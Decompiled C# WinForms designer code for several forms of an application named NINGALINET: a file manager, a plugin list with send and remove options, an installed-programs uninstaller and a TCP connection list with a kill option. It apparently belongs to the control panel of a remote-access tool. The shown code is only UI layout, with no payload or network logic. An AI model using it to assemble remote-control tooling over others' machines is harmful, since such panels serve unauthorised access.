     arg_121F_0.Size               = size;
     this.ToolStripButton4.Text    = "View Title";
     this.ToolStripSeparator6.Name = "ToolStripSeparator6";
     global::System.Windows.Forms.ToolStripItem arg_1255_0 = this.ToolStripSeparator6;
     size            = new global::System.Drawing.Size(6, 23);
     arg_1255_0.Size = size;
     this.ToolStripButton1.Checked               = true;
     this.ToolStripButton1.CheckState            = global::System.Windows.Forms.CheckState.Checked;
     this.ToolStripButton1.DisplayStyle          = global::System.Windows.Forms.ToolStripItemDisplayStyle.Image;
     this.ToolStripButton1.Image                 = (global::System.Drawing.Image)componentResourceManager.GetObject("ToolStripButton1.Image");
     this.ToolStripButton1.ImageTransparentColor = global::System.Drawing.Color.Magenta;
     this.ToolStripButton1.Name = "ToolStripButton1";
     global::System.Windows.Forms.ToolStripItem arg_12CB_0 = this.ToolStripButton1;
     size                             = new global::System.Drawing.Size(23, 20);
     arg_12CB_0.Size                  = size;
     this.ToolStripButton1.Text       = "Preview File Sellected";
     this.SplitContainer1.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
     this.SplitContainer1.Dock        = global::System.Windows.Forms.DockStyle.Fill;
     this.SplitContainer1.FixedPanel  = global::System.Windows.Forms.FixedPanel.Panel1;
     global::System.Windows.Forms.Control arg_1315_0 = this.SplitContainer1;
     location                  = new global::System.Drawing.Point(0, 53);
     arg_1315_0.Location       = location;
     this.SplitContainer1.Name = "SplitContainer1";
     this.SplitContainer1.Panel1.Controls.Add(this.L1);
     this.SplitContainer1.Panel2.Controls.Add(this.SplitContainer2);
     global::System.Windows.Forms.Control arg_1378_0 = this.SplitContainer1;
     size            = new global::System.Drawing.Size(584, 272);
     arg_1378_0.Size = size;
     this.SplitContainer1.SplitterDistance = 129;
     this.SplitContainer1.SplitterWidth    = 1;
     this.SplitContainer1.TabIndex         = 13;
     this.L1.BackColor   = global::System.Drawing.Color.Black;
     this.L1.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
     this.L1.Columns.AddRange(new global::System.Windows.Forms.ColumnHeader[]
     {
         this.ColumnHeader6,
         this.ColumnHeader8
     });
     this.L1.ContextMenuStrip = this.ContextMenuStrip1;
     this.L1.Dock             = global::System.Windows.Forms.DockStyle.Fill;
     this.L1.Font             = new global::System.Drawing.Font("Arial", 8.25f);
     this.L1.ForeColor        = global::System.Drawing.Color.WhiteSmoke;
     this.L1.FullRowSelect    = true;
     this.L1.LargeImageList   = this.MG;
     global::System.Windows.Forms.Control arg_1464_0 = this.L1;
     location            = new global::System.Drawing.Point(0, 0);
     arg_1464_0.Location = location;
     this.L1.Name        = "L1";
     this.L1.OwnerDraw   = true;
     global::System.Windows.Forms.Control arg_149A_0 = this.L1;
     size                   = new global::System.Drawing.Size(127, 270);
     arg_149A_0.Size        = size;
     this.L1.SmallImageList = this.MG;
     this.L1.TabIndex       = 9;
     this.L1.UseCompatibleStateImageBehavior = false;
     this.L1.View             = global::System.Windows.Forms.View.Details;
     this.ColumnHeader6.Text  = "Name";
     this.ColumnHeader8.Text  = "Type";
     this.ColumnHeader8.Width = 67;
     this.MG.ImageStream      = (global::System.Windows.Forms.ImageListStreamer)componentResourceManager.GetObject("MG.ImageStream");
     this.MG.TransparentColor = global::System.Drawing.Color.Transparent;
     this.MG.Images.SetKeyName(0, "0.bmp");
     this.MG.Images.SetKeyName(1, "1.bmp");
     this.MG.Images.SetKeyName(2, "2.bmp");
     this.MG.Images.SetKeyName(3, "3.bmp");
     this.MG.Images.SetKeyName(4, "4.bmp");
     this.SplitContainer2.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
     this.SplitContainer2.Dock        = global::System.Windows.Forms.DockStyle.Fill;
     this.SplitContainer2.FixedPanel  = global::System.Windows.Forms.FixedPanel.Panel2;
     global::System.Windows.Forms.Control arg_15CF_0 = this.SplitContainer2;
     location                  = new global::System.Drawing.Point(0, 0);
     arg_15CF_0.Location       = location;
     this.SplitContainer2.Name = "SplitContainer2";
     this.SplitContainer2.Panel1.Controls.Add(this.L2);
     this.SplitContainer2.Panel2.Controls.Add(this.RichTextBox1);
     global::System.Windows.Forms.Control arg_1632_0 = this.SplitContainer2;
     size            = new global::System.Drawing.Size(454, 272);
     arg_1632_0.Size = size;
     this.SplitContainer2.SplitterDistance = 341;
     this.SplitContainer2.SplitterWidth    = 1;
     this.SplitContainer2.TabIndex         = 10;
     this.L2.BackColor   = global::System.Drawing.Color.Black;
     this.L2.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
     this.L2.Columns.AddRange(new global::System.Windows.Forms.ColumnHeader[]
     {
         this.ColumnHeader2,
         this.ColumnHeader3,
         this.ColumnHeader4
     });
     this.L2.ContextMenuStrip = this.ContextMenuStrip2;
     this.L2.Dock             = global::System.Windows.Forms.DockStyle.Fill;
     this.L2.Font             = new global::System.Drawing.Font("Arial", 8f);
     this.L2.ForeColor        = global::System.Drawing.Color.WhiteSmoke;
     this.L2.FullRowSelect    = true;
     this.L2.LargeImageList   = this.MG2;
     global::System.Windows.Forms.Control arg_1728_0 = this.L2;
     location            = new global::System.Drawing.Point(0, 0);
     arg_1728_0.Location = location;
     this.L2.Name        = "L2";
     this.L2.OwnerDraw   = true;
     global::System.Windows.Forms.Control arg_1761_0 = this.L2;
     size                   = new global::System.Drawing.Size(339, 270);
     arg_1761_0.Size        = size;
     this.L2.SmallImageList = this.MG2;
     this.L2.TabIndex       = 7;
     this.L2.UseCompatibleStateImageBehavior = false;
     this.L2.View             = global::System.Windows.Forms.View.Details;
     this.ColumnHeader2.Text  = "Name";
     this.ColumnHeader2.Width = 175;
     this.ColumnHeader3.Text  = "Size";
     this.ColumnHeader3.Width = 66;
     this.ColumnHeader4.Text  = "Type";
     this.ColumnHeader4.Width = 197;
     this.MG2.ColorDepth      = global::System.Windows.Forms.ColorDepth.Depth32Bit;
     global::System.Windows.Forms.ImageList arg_1817_0 = this.MG2;
     size = new global::System.Drawing.Size(18, 18);
     arg_1817_0.ImageSize               = size;
     this.MG2.TransparentColor          = global::System.Drawing.Color.Transparent;
     this.RichTextBox1.BackColor        = global::System.Drawing.Color.FromArgb(40, 40, 40);
     this.RichTextBox1.BorderStyle      = global::System.Windows.Forms.BorderStyle.None;
     this.RichTextBox1.ContextMenuStrip = this.ContextMenuStrip3;
     this.RichTextBox1.Dock             = global::System.Windows.Forms.DockStyle.Fill;
     this.RichTextBox1.Font             = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
     this.RichTextBox1.ForeColor        = global::System.Drawing.Color.WhiteSmoke;
     global::System.Windows.Forms.Control arg_18A8_0 = this.RichTextBox1;
     location               = new global::System.Drawing.Point(0, 0);
     arg_18A8_0.Location    = location;
     this.RichTextBox1.Name = "RichTextBox1";
     global::System.Windows.Forms.Control arg_18D2_0 = this.RichTextBox1;
     size                       = new global::System.Drawing.Size(110, 270);
     arg_18D2_0.Size            = size;
     this.RichTextBox1.TabIndex = 8;
     this.RichTextBox1.Text     = "Sellect a file to preview.";
     this.ContextMenuStrip3.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.SaveToolStripMenuItem,
         this.AToolStripMenuItem,
         this.SellectAllToolStripMenuItem,
         this.ToolStripSeparator7,
         this.CutToolStripMenuItem1,
         this.CopyToolStripMenuItem1,
         this.PasteToolStripMenuItem
     });
     this.ContextMenuStrip3.Name = "ContextMenuStrip1";
     global::System.Windows.Forms.Control arg_196C_0 = this.ContextMenuStrip3;
     size            = new global::System.Drawing.Size(126, 126);
     arg_196C_0.Size = size;
     this.SaveToolStripMenuItem.Name = "SaveToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_1993_0 = this.SaveToolStripMenuItem;
     size            = new global::System.Drawing.Size(125, 22);
     arg_1993_0.Size = size;
     this.SaveToolStripMenuItem.Text = "Save";
     this.AToolStripMenuItem.Name    = "AToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_19C9_0 = this.AToolStripMenuItem;
     size            = new global::System.Drawing.Size(122, 6);
     arg_19C9_0.Size = size;
     this.SellectAllToolStripMenuItem.Name = "SellectAllToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_19F0_0 = this.SellectAllToolStripMenuItem;
     size            = new global::System.Drawing.Size(125, 22);
     arg_19F0_0.Size = size;
     this.SellectAllToolStripMenuItem.Text = "Sellect All";
     this.ToolStripSeparator7.Name         = "ToolStripSeparator7";
     global::System.Windows.Forms.ToolStripItem arg_1A26_0 = this.ToolStripSeparator7;
     size            = new global::System.Drawing.Size(122, 6);
     arg_1A26_0.Size = size;
     this.CutToolStripMenuItem1.Name = "CutToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem arg_1A4D_0 = this.CutToolStripMenuItem1;
     size            = new global::System.Drawing.Size(125, 22);
     arg_1A4D_0.Size = size;
     this.CutToolStripMenuItem1.Text  = "Cut";
     this.CopyToolStripMenuItem1.Name = "CopyToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem arg_1A84_0 = this.CopyToolStripMenuItem1;
     size            = new global::System.Drawing.Size(125, 22);
     arg_1A84_0.Size = size;
     this.CopyToolStripMenuItem1.Text = "Copy";
     this.PasteToolStripMenuItem.Name = "PasteToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_1ABB_0 = this.PasteToolStripMenuItem;
     size            = new global::System.Drawing.Size(125, 22);
     arg_1ABB_0.Size = size;
     this.PasteToolStripMenuItem.Text = "Paste";
     this.pr.BackColor     = global::System.Drawing.Color.Transparent;
     this.pr.Colors        = new global::NINGALINET.Bloom[0];
     this.pr.Customization = global::NINGALINET.My.Resources.Resources.notf;
     this.pr.Dock          = global::System.Windows.Forms.DockStyle.Bottom;
     this.pr.Font          = new global::System.Drawing.Font("Verdana", 8f);
     this.pr.Image         = null;
     global::System.Windows.Forms.Control arg_1B47_0 = this.pr;
     location            = new global::System.Drawing.Point(0, 325);
     arg_1B47_0.Location = location;
     this.pr.Maximum     = 100;
     this.pr.Name        = "pr";
     this.pr.NoRounding  = false;
     global::System.Windows.Forms.Control arg_1B8A_0 = this.pr;
     size                = new global::System.Drawing.Size(584, 15);
     arg_1B8A_0.Size     = size;
     this.pr.TabIndex    = 12;
     this.pr.Text        = "ChProgressbar1";
     this.pr.Transparent = true;
     this.pr.Value       = 0;
     global::System.Drawing.SizeF autoScaleDimensions = new global::System.Drawing.SizeF(6f, 13f);
     this.AutoScaleDimensions = autoScaleDimensions;
     this.AutoScaleMode       = global::System.Windows.Forms.AutoScaleMode.Font;
     this.BackColor           = global::System.Drawing.Color.Black;
     size            = new global::System.Drawing.Size(584, 362);
     this.ClientSize = size;
     this.Controls.Add(this.SplitContainer1);
     this.Controls.Add(this.pr);
     this.Controls.Add(this.Panel1);
     this.Controls.Add(this.StatusStrip1);
     this.ForeColor     = global::System.Drawing.Color.WhiteSmoke;
     this.Name          = "FrmFilemanager";
     this.ShowIcon      = false;
     this.StartPosition = global::System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "FM";
     this.StatusStrip1.ResumeLayout(false);
     this.StatusStrip1.PerformLayout();
     this.ContextMenuStrip1.ResumeLayout(false);
     this.ContextMenuStrip2.ResumeLayout(false);
     ((global::System.ComponentModel.ISupportInitialize) this.PictureBox2).EndInit();
     ((global::System.ComponentModel.ISupportInitialize) this.PictureBox1).EndInit();
     this.Panel1.ResumeLayout(false);
     this.Panel1.PerformLayout();
     this.ToolStrip1.ResumeLayout(false);
     this.ToolStrip1.PerformLayout();
     this.SplitContainer1.Panel1.ResumeLayout(false);
     this.SplitContainer1.Panel2.ResumeLayout(false);
     this.SplitContainer1.ResumeLayout(false);
     this.SplitContainer2.Panel1.ResumeLayout(false);
     this.SplitContainer2.Panel2.ResumeLayout(false);
     this.SplitContainer2.ResumeLayout(false);
     this.ContextMenuStrip3.ResumeLayout(false);
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Exemple #3
0
 private void InitializeComponent()
 {
     this.components = new global::System.ComponentModel.Container();
     global::System.ComponentModel.ComponentResourceManager componentResourceManager = new global::System.ComponentModel.ComponentResourceManager(typeof(global::NINGALINET.FrmInfoPlugin));
     this.pr                       = new global::NINGALINET.CHProgressbar();
     this.StatusStrip1             = new global::System.Windows.Forms.StatusStrip();
     this.SL                       = new global::System.Windows.Forms.ToolStripStatusLabel();
     this.Lv1                      = new global::NINGALINET.LV();
     this.ColumnHeader1            = new global::System.Windows.Forms.ColumnHeader();
     this.ContextMenuStrip1        = new global::System.Windows.Forms.ContextMenuStrip(this.components);
     this.RefreshToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.AToolStripMenuItem       = new global::System.Windows.Forms.ToolStripSeparator();
     this.UploadUpdatePluginFromDiskToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.RemoveSelectedToolStripMenuItem             = new global::System.Windows.Forms.ToolStripMenuItem();
     this.RemoveAllToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ImageList1 = new global::System.Windows.Forms.ImageList(this.components);
     this.StatusStrip1.SuspendLayout();
     this.ContextMenuStrip1.SuspendLayout();
     this.SuspendLayout();
     this.pr.BackColor     = global::System.Drawing.Color.Transparent;
     this.pr.Colors        = new global::NINGALINET.Bloom[0];
     this.pr.Customization = global::NINGALINET.My.Resources.Resources.notf;
     this.pr.Dock          = global::System.Windows.Forms.DockStyle.Bottom;
     this.pr.Font          = new global::System.Drawing.Font("Verdana", 8f);
     this.pr.Image         = null;
     global::System.Windows.Forms.Control arg_13E_0 = this.pr;
     global::System.Drawing.Point         location  = new global::System.Drawing.Point(0, 325);
     arg_13E_0.Location = location;
     this.pr.Maximum    = 100;
     this.pr.Name       = "pr";
     this.pr.NoRounding = false;
     global::System.Windows.Forms.Control arg_181_0 = this.pr;
     global::System.Drawing.Size          size      = new global::System.Drawing.Size(584, 15);
     arg_181_0.Size              = size;
     this.pr.TabIndex            = 33;
     this.pr.Text                = "ChProgressbar1";
     this.pr.Transparent         = true;
     this.pr.Value               = 0;
     this.StatusStrip1.BackColor = global::System.Drawing.Color.Black;
     this.StatusStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.SL
     });
     global::System.Windows.Forms.Control arg_200_0 = this.StatusStrip1;
     location               = new global::System.Drawing.Point(0, 340);
     arg_200_0.Location     = location;
     this.StatusStrip1.Name = "StatusStrip1";
     global::System.Windows.Forms.Control arg_22A_0 = this.StatusStrip1;
     size           = new global::System.Drawing.Size(584, 22);
     arg_22A_0.Size = size;
     this.StatusStrip1.SizingGrip = false;
     this.StatusStrip1.TabIndex   = 32;
     this.StatusStrip1.Text       = "StatusStrip1";
     this.SL.ForeColor            = global::System.Drawing.Color.WhiteSmoke;
     this.SL.Name = "SL";
     global::System.Windows.Forms.ToolStripItem arg_28A_0 = this.SL;
     size                 = new global::System.Drawing.Size(13, 17);
     arg_28A_0.Size       = size;
     this.SL.Text         = "..";
     this.Lv1.BackColor   = global::System.Drawing.Color.Black;
     this.Lv1.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
     this.Lv1.Columns.AddRange(new global::System.Windows.Forms.ColumnHeader[]
     {
         this.ColumnHeader1
     });
     this.Lv1.ContextMenuStrip = this.ContextMenuStrip1;
     this.Lv1.Dock             = global::System.Windows.Forms.DockStyle.Fill;
     this.Lv1.Font             = new global::System.Drawing.Font("Arial", 8.25f);
     this.Lv1.ForeColor        = global::System.Drawing.Color.WhiteSmoke;
     this.Lv1.FullRowSelect    = true;
     this.Lv1.LargeImageList   = this.ImageList1;
     global::System.Windows.Forms.Control arg_353_0 = this.Lv1;
     location           = new global::System.Drawing.Point(0, 0);
     arg_353_0.Location = location;
     this.Lv1.Name      = "Lv1";
     this.Lv1.OwnerDraw = true;
     global::System.Windows.Forms.Control arg_38C_0 = this.Lv1;
     size                    = new global::System.Drawing.Size(584, 325);
     arg_38C_0.Size          = size;
     this.Lv1.SmallImageList = this.ImageList1;
     this.Lv1.TabIndex       = 34;
     this.Lv1.UseCompatibleStateImageBehavior = false;
     this.Lv1.View           = global::System.Windows.Forms.View.Details;
     this.ColumnHeader1.Text = "Name";
     this.ContextMenuStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.RefreshToolStripMenuItem,
         this.AToolStripMenuItem,
         this.UploadUpdatePluginFromDiskToolStripMenuItem,
         this.RemoveSelectedToolStripMenuItem,
         this.RemoveAllToolStripMenuItem
     });
     this.ContextMenuStrip1.Name = "ContextMenuStrip1";
     global::System.Windows.Forms.Control arg_441_0 = this.ContextMenuStrip1;
     size           = new global::System.Drawing.Size(177, 120);
     arg_441_0.Size = size;
     this.RefreshToolStripMenuItem.Name = "RefreshToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_46B_0 = this.RefreshToolStripMenuItem;
     size           = new global::System.Drawing.Size(176, 22);
     arg_46B_0.Size = size;
     this.RefreshToolStripMenuItem.Text = "Refresh";
     this.AToolStripMenuItem.Name       = "AToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_4A4_0 = this.AToolStripMenuItem;
     size           = new global::System.Drawing.Size(173, 6);
     arg_4A4_0.Size = size;
     this.UploadUpdatePluginFromDiskToolStripMenuItem.Name = "UploadUpdatePluginFromDiskToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_4CE_0 = this.UploadUpdatePluginFromDiskToolStripMenuItem;
     size           = new global::System.Drawing.Size(176, 22);
     arg_4CE_0.Size = size;
     this.UploadUpdatePluginFromDiskToolStripMenuItem.Text = "Send From Disk";
     this.RemoveSelectedToolStripMenuItem.Name             = "RemoveSelectedToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_508_0 = this.RemoveSelectedToolStripMenuItem;
     size           = new global::System.Drawing.Size(176, 22);
     arg_508_0.Size = size;
     this.RemoveSelectedToolStripMenuItem.Text = "Remove Selected";
     this.RemoveAllToolStripMenuItem.Name      = "RemoveAllToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_542_0 = this.RemoveAllToolStripMenuItem;
     size           = new global::System.Drawing.Size(176, 22);
     arg_542_0.Size = size;
     this.RemoveAllToolStripMenuItem.Text = "Remove All Plugins";
     this.ImageList1.ImageStream          = (global::System.Windows.Forms.ImageListStreamer)componentResourceManager.GetObject("ImageList1.ImageStream");
     this.ImageList1.TransparentColor     = global::System.Drawing.Color.Transparent;
     this.ImageList1.Images.SetKeyName(0, "application_app_edit_pixel_perfect-16.png");
     global::System.Drawing.SizeF autoScaleDimensions = new global::System.Drawing.SizeF(6f, 14f);
     this.AutoScaleDimensions = autoScaleDimensions;
     this.AutoScaleMode       = global::System.Windows.Forms.AutoScaleMode.Font;
     this.BackColor           = global::System.Drawing.Color.Black;
     size            = new global::System.Drawing.Size(584, 362);
     this.ClientSize = size;
     this.Controls.Add(this.Lv1);
     this.Controls.Add(this.pr);
     this.Controls.Add(this.StatusStrip1);
     this.Font          = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
     this.ForeColor     = global::System.Drawing.Color.WhiteSmoke;
     this.Name          = "FrmInfoPlugin";
     this.ShowIcon      = false;
     this.StartPosition = global::System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "FrmInfoPlugin";
     this.StatusStrip1.ResumeLayout(false);
     this.StatusStrip1.PerformLayout();
     this.ContextMenuStrip1.ResumeLayout(false);
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Exemple #4
0
 private void InitializeComponent()
 {
     this.components = new global::System.ComponentModel.Container();
     global::System.ComponentModel.ComponentResourceManager componentResourceManager = new global::System.ComponentModel.ComponentResourceManager(typeof(global::NINGALINET.FrmInstalled));
     this.ContextMenuStrip1                 = new global::System.Windows.Forms.ContextMenuStrip(this.components);
     this.RefreshToolStripMenuItem          = new global::System.Windows.Forms.ToolStripMenuItem();
     this.DToolStripMenuItem                = new global::System.Windows.Forms.ToolStripSeparator();
     this.UnistallAProgramToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.StatusStrip1  = new global::System.Windows.Forms.StatusStrip();
     this.SL            = new global::System.Windows.Forms.ToolStripStatusLabel();
     this.Timer1        = new global::System.Windows.Forms.Timer(this.components);
     this.pr            = new global::NINGALINET.CHProgressbar();
     this.L1            = new global::NINGALINET.LV();
     this.ColumnHeader1 = new global::System.Windows.Forms.ColumnHeader();
     this.ContextMenuStrip1.SuspendLayout();
     this.StatusStrip1.SuspendLayout();
     this.SuspendLayout();
     this.ContextMenuStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.RefreshToolStripMenuItem,
         this.DToolStripMenuItem,
         this.UnistallAProgramToolStripMenuItem
     });
     this.ContextMenuStrip1.Name = "ContextMenuStrip1";
     global::System.Windows.Forms.Control arg_109_0 = this.ContextMenuStrip1;
     global::System.Drawing.Size          size      = new global::System.Drawing.Size(172, 76);
     arg_109_0.Size = size;
     this.RefreshToolStripMenuItem.Name = "RefreshToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_133_0 = this.RefreshToolStripMenuItem;
     size           = new global::System.Drawing.Size(171, 22);
     arg_133_0.Size = size;
     this.RefreshToolStripMenuItem.Text = "Refresh";
     this.DToolStripMenuItem.Name       = "DToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_16C_0 = this.DToolStripMenuItem;
     size           = new global::System.Drawing.Size(168, 6);
     arg_16C_0.Size = size;
     this.UnistallAProgramToolStripMenuItem.Image = (global::System.Drawing.Image)componentResourceManager.GetObject("UnistallAProgramToolStripMenuItem.Image");
     this.UnistallAProgramToolStripMenuItem.Name  = "UnistallAProgramToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_1B1_0 = this.UnistallAProgramToolStripMenuItem;
     size           = new global::System.Drawing.Size(171, 22);
     arg_1B1_0.Size = size;
     this.UnistallAProgramToolStripMenuItem.Text = "Unistall a Program";
     this.StatusStrip1.BackColor = global::System.Drawing.Color.Black;
     this.StatusStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.SL
     });
     global::System.Windows.Forms.Control arg_20B_0 = this.StatusStrip1;
     global::System.Drawing.Point         location  = new global::System.Drawing.Point(0, 340);
     arg_20B_0.Location     = location;
     this.StatusStrip1.Name = "StatusStrip1";
     global::System.Windows.Forms.Control arg_235_0 = this.StatusStrip1;
     size                       = new global::System.Drawing.Size(584, 22);
     arg_235_0.Size             = size;
     this.StatusStrip1.TabIndex = 1;
     this.StatusStrip1.Text     = "StatusStrip1";
     this.SL.ForeColor          = global::System.Drawing.Color.WhiteSmoke;
     this.SL.Name               = "SL";
     global::System.Windows.Forms.ToolStripItem arg_288_0 = this.SL;
     size                  = new global::System.Drawing.Size(13, 17);
     arg_288_0.Size        = size;
     this.SL.Text          = "..";
     this.pr.BackColor     = global::System.Drawing.Color.Transparent;
     this.pr.Colors        = new global::NINGALINET.Bloom[0];
     this.pr.Customization = global::NINGALINET.My.Resources.Resources.notf;
     this.pr.Dock          = global::System.Windows.Forms.DockStyle.Bottom;
     this.pr.Font          = new global::System.Drawing.Font("Verdana", 8f);
     this.pr.Image         = null;
     global::System.Windows.Forms.Control arg_314_0 = this.pr;
     location           = new global::System.Drawing.Point(0, 325);
     arg_314_0.Location = location;
     this.pr.Maximum    = 100;
     this.pr.Name       = "pr";
     this.pr.NoRounding = false;
     global::System.Windows.Forms.Control arg_357_0 = this.pr;
     size                = new global::System.Drawing.Size(584, 15);
     arg_357_0.Size      = size;
     this.pr.TabIndex    = 2;
     this.pr.Text        = "ChProgressbar1";
     this.pr.Transparent = true;
     this.pr.Value       = 0;
     this.L1.BackColor   = global::System.Drawing.Color.Black;
     this.L1.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
     this.L1.Columns.AddRange(new global::System.Windows.Forms.ColumnHeader[]
     {
         this.ColumnHeader1
     });
     this.L1.ContextMenuStrip = this.ContextMenuStrip1;
     this.L1.Dock             = global::System.Windows.Forms.DockStyle.Fill;
     this.L1.Font             = new global::System.Drawing.Font("Arial", 8f);
     this.L1.ForeColor        = global::System.Drawing.Color.WhiteSmoke;
     this.L1.FullRowSelect    = true;
     global::System.Windows.Forms.Control arg_433_0 = this.L1;
     location           = new global::System.Drawing.Point(0, 0);
     arg_433_0.Location = location;
     this.L1.Name       = "L1";
     this.L1.OwnerDraw  = true;
     global::System.Windows.Forms.Control arg_46C_0 = this.L1;
     size             = new global::System.Drawing.Size(584, 325);
     arg_46C_0.Size   = size;
     this.L1.TabIndex = 3;
     this.L1.UseCompatibleStateImageBehavior = false;
     this.L1.View             = global::System.Windows.Forms.View.Details;
     this.ColumnHeader1.Text  = "Name";
     this.ColumnHeader1.Width = 584;
     global::System.Drawing.SizeF autoScaleDimensions = new global::System.Drawing.SizeF(6f, 13f);
     this.AutoScaleDimensions = autoScaleDimensions;
     this.AutoScaleMode       = global::System.Windows.Forms.AutoScaleMode.Font;
     this.BackColor           = global::System.Drawing.Color.Black;
     size            = new global::System.Drawing.Size(584, 362);
     this.ClientSize = size;
     this.Controls.Add(this.L1);
     this.Controls.Add(this.pr);
     this.Controls.Add(this.StatusStrip1);
     this.Name          = "FrmInstalled";
     this.ShowIcon      = false;
     this.StartPosition = global::System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "Form2";
     this.ContextMenuStrip1.ResumeLayout(false);
     this.StatusStrip1.ResumeLayout(false);
     this.StatusStrip1.PerformLayout();
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Exemple #5
0
 private void InitializeComponent()
 {
     this.components                      = new global::System.ComponentModel.Container();
     this.StatusStrip1                    = new global::System.Windows.Forms.StatusStrip();
     this.sl                              = new global::System.Windows.Forms.ToolStripStatusLabel();
     this.ContextMenuStrip1               = new global::System.Windows.Forms.ContextMenuStrip(this.components);
     this.RefreshToolStripMenuItem        = new global::System.Windows.Forms.ToolStripMenuItem();
     this.AToolStripMenuItem              = new global::System.Windows.Forms.ToolStripSeparator();
     this.KillConnectionToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.Timer1                          = new global::System.Windows.Forms.Timer(this.components);
     this.pr                              = new global::NINGALINET.CHProgressbar();
     this.LTCP                            = new global::NINGALINET.LV();
     this.ColumnHeader1                   = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader2                   = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader3                   = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader4                   = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader5                   = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader6                   = new global::System.Windows.Forms.ColumnHeader();
     this.StatusStrip1.SuspendLayout();
     this.ContextMenuStrip1.SuspendLayout();
     this.SuspendLayout();
     this.StatusStrip1.BackColor = global::System.Drawing.Color.Black;
     this.StatusStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.sl
     });
     global::System.Windows.Forms.Control arg_11D_0 = this.StatusStrip1;
     global::System.Drawing.Point         location  = new global::System.Drawing.Point(0, 340);
     arg_11D_0.Location     = location;
     this.StatusStrip1.Name = "StatusStrip1";
     global::System.Windows.Forms.Control arg_147_0 = this.StatusStrip1;
     global::System.Drawing.Size          size      = new global::System.Drawing.Size(584, 22);
     arg_147_0.Size             = size;
     this.StatusStrip1.TabIndex = 1;
     this.StatusStrip1.Text     = "StatusStrip1";
     this.sl.ForeColor          = global::System.Drawing.Color.WhiteSmoke;
     this.sl.Name = "sl";
     global::System.Windows.Forms.ToolStripItem arg_19A_0 = this.sl;
     size           = new global::System.Drawing.Size(13, 17);
     arg_19A_0.Size = size;
     this.sl.Text   = "..";
     this.ContextMenuStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.RefreshToolStripMenuItem,
         this.AToolStripMenuItem,
         this.KillConnectionToolStripMenuItem
     });
     this.ContextMenuStrip1.Name = "ContextMenuStrip1";
     global::System.Windows.Forms.Control arg_207_0 = this.ContextMenuStrip1;
     size           = new global::System.Drawing.Size(156, 76);
     arg_207_0.Size = size;
     this.RefreshToolStripMenuItem.Name = "RefreshToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_231_0 = this.RefreshToolStripMenuItem;
     size           = new global::System.Drawing.Size(155, 22);
     arg_231_0.Size = size;
     this.RefreshToolStripMenuItem.Text = "Refresh";
     this.AToolStripMenuItem.Name       = "AToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_26A_0 = this.AToolStripMenuItem;
     size           = new global::System.Drawing.Size(152, 6);
     arg_26A_0.Size = size;
     this.KillConnectionToolStripMenuItem.Name = "KillConnectionToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_294_0 = this.KillConnectionToolStripMenuItem;
     size           = new global::System.Drawing.Size(155, 22);
     arg_294_0.Size = size;
     this.KillConnectionToolStripMenuItem.Text = "Kill Connection";
     this.pr.BackColor     = global::System.Drawing.Color.Transparent;
     this.pr.Colors        = new global::NINGALINET.Bloom[0];
     this.pr.Customization = global::NINGALINET.My.Resources.Resources.notf;
     this.pr.Dock          = global::System.Windows.Forms.DockStyle.Bottom;
     this.pr.Font          = new global::System.Drawing.Font("Verdana", 8f);
     this.pr.Image         = null;
     global::System.Windows.Forms.Control arg_320_0 = this.pr;
     location           = new global::System.Drawing.Point(0, 325);
     arg_320_0.Location = location;
     this.pr.Maximum    = 100;
     this.pr.Name       = "pr";
     this.pr.NoRounding = false;
     global::System.Windows.Forms.Control arg_363_0 = this.pr;
     size                  = new global::System.Drawing.Size(584, 15);
     arg_363_0.Size        = size;
